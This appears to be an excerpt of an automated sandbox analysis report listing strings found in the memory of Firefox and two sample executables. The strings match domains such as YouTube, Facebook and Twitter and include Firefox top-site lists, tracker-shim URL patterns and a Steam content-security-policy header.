Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJE equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJE equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UpdateService:selectUpdate - the user requires elevation to install this update, but the user has exceeded the max number of elevation attempts.https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB5D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB5D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001B.00000002.3113974660.000002550A210000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: file.exe, 00000000.00000003.2126652942.0000000000D05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.ak equals www.youtube.com (Youtube)
Source: 09d417a7c4.exe, 00000010.00000002.2950222857.0000000001017000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3053862003.0000025507C11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 0000001B.00000002.3053862003.0000025507C11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3096434663.0000025509328000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2946171739.0000025510196000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3113974660.000002550A267000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000003.2946171739.0000025510196000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3168469496.00001C9FBA704000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3082928833.00000255085C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FBE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3118920098.000002550A870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/(browserSettings.update.channel == "release") && (!((currentDate|date - profileAgeCreated|date) / 3600000 <= 24)) && (version|versionCompare('116.!') >= 0) equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/(browserSettings.update.channel == "release") && (!((currentDate|date - profileAgeCreated|date) / 3600000 <= 24)) && (version|versionCompare('116.!') >= 0) equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3163874146.000002557FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/(browserSettings.update.channel == "release") && (!((currentDate|date - profileAgeCreated|date) / 3600000 <= 24)) && (version|versionCompare('116.!') >= 0) equals www.youtube.com (Youtube)
